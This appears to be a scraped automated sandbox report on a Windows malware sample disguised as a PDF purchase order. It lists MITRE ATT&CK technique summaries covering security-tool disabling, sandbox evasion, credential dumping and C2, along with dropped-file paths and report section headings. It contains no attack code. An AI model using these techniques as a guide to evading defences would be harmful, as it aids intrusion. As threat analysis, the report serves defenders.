Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO-000172483 pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-000172483 pdf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\--cG1-69-

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ughpzhk.nle.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gsdjczie.sgx.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ibl31a5g.5ot.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jemiyayw.rnw.psm1

C:\Windows\System32\wbem\Performance\WmiApRpl_new.h

C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
PO-000172483 pdf.exe

Function 090E0328 Relevance: 8.5, Strings: 6, Instructions: 1029
COMMON

Function 00BA3470 Relevance: 5.3, Strings: 4, Instructions: 267
COMMON

Function 00BA3377 Relevance: 4.1, Strings: 3, Instructions: 316
COMMON

Function 00BA359C Relevance: 4.0, Strings: 3, Instructions: 235
COMMON

Function 00BA3895 Relevance: 4.0, Strings: 3, Instructions: 233
COMMON

Function 00BA35EA Relevance: 4.0, Strings: 3, Instructions: 228
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre